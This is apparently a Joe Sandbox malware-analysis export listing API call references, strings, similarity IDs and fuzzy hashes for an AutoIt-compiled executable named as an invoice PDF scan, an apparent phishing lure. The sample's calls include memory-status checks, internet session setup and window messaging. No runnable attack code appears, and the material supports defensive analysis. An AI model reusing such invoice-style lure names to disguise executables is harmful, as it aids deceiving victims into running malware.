                                                                              • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00417D1A
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __getptd.LIBCMT ref: 00417D31
                                                                              • __amsg_exit.LIBCMT ref: 00417D3F
                                                                              • __lock.LIBCMT ref: 00417D4F
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471144
                                                                              • GetDC.USER32(00000000), ref: 0047114D
                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471102
                                                                              • GetDC.USER32(00000000), ref: 0047110B
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                              • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00414080
                                                                              • __freeptd.LIBCMT ref: 0041408A
                                                                              • ExitThread.KERNEL32 ref: 00414093
                                                                              Similarity
                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3182216644-0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: $8'I
                                                                              • API String ID: 2358735015-3608026889
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3380330463-3941886329
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH
                                                                              • API String ID: 1143807570-3662162768
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH$HH
                                                                              • API String ID: 0-1787419579
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00474833
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InternetOpen
                                                                              • String ID: <local>
                                                                              • API String ID: 2038078732-4266983199
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ,$UTF8)
                                                                              • API String ID: 909875538-2632631837
                                                                              • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                              • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                              • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                              • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ,$UTF8)
                                                                              • API String ID: 909875538-2632631837
                                                                              • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                              • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                              • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                              • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • wsprintfW.USER32 ref: 004560E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_mallocwsprintf
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 1262938277-328681919
                                                                              • Opcode ID: 6f0300f69b2e417eb2941b05fd198bac596540c0f64dad80bfe88e34e38ee896
                                                                              • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                              • Opcode Fuzzy Hash: 6f0300f69b2e417eb2941b05fd198bac596540c0f64dad80bfe88e34e38ee896
                                                                              • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                              • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                              • PostMessageW.USER32(00000000), ref: 00442247
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                              • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                              • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E